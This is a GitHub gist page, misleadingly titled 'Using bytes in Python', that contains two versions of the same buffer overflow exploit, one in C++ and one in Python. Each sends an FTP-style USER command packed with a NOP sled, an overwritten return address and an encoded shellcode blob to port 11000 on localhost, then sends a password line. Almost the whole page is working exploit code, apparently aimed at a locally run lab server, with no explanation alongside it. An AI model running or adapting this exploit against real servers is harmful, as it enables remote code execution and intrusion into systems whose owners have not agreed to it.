Skip to content

Instantly share code, notes, and snippets.

@Jeswang
Created October 30, 2012 00:07
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save Jeswang/3977494 to your computer and use it in GitHub Desktop.
Using bytes in Python.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <iostream>
#include <string>
using namespace std;
void error(const char *msg)
{
perror(msg);
exit(0);
}
char port[] = "11000";
char address[] = "localhost";
unsigned char shellcode_cstr[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
"\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
"\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
"\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
"\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
"\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
"\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
"\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
"\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
"\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
"\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
"\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
"\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
"\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
"\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
"\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
"\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
"\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
"\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
"\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
"\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
"\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
"\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
"\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
"\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
"\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
"\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a";
unsigned char nop = '\x90';
int main(int argc, char *argv[])
{
int sockfd, portno, n;
struct sockaddr_in serv_addr;
struct hostent *server;
string fill(485, nop);
string fill2(20, nop);
string eip_address("\x12\x45\xfa\x7f");
string shellcode = "";
shellcode += (char*)shellcode_cstr;
string user_line = "USER "+fill+eip_address+fill2+shellcode+"\n";
string pass_line("PASS 123\n");
char buffer[2000];
portno = atoi(port);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0)
error("ERROR opening socket");
server = gethostbyname(address);
if (server == NULL) {
fprintf(stderr,"ERROR, no such host\n");
exit(0);
}
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
bcopy((char *)server->h_addr,
(char *)&serv_addr.sin_addr.s_addr,
server->h_length);
serv_addr.sin_port = htons(portno);
if (connect(sockfd,(struct sockaddr *) &serv_addr,sizeof(serv_addr)) < 0)
error("ERROR connecting");
strcpy( buffer, user_line.c_str());
n = write(sockfd,buffer,strlen(buffer));
if (n < 0)
error("ERROR writing to socket");
strcpy( buffer, pass_line.c_str());
n = write(sockfd,buffer,strlen(buffer));
if (n < 0)
error("ERROR writing to socket");
close(sockfd);
return 0;
}
# -*- coding:utf-8 -*-
import struct
import telnetlib
#填充数据
fill = '\x90' * 485
eip_address = '\x12\x45\xfa\x7f'
fill2 = '\x90' * 20
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
"\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
"\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
"\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
"\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
"\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
"\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
"\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
"\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
"\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
"\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
"\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
"\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
"\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
"\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
"\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
"\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
"\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
"\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
"\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
"\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
"\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
"\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
"\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
"\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
"\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
"\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a"
)
tn = telnetlib.Telnet('127.0.0.1', 11000)
user_string = "USER " + fill + eip_address + fill2 + shellcode + '\r\n'
tn.write(user_string)
pass_string = "PASS 123\r\n"
tn.write(pass_string)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment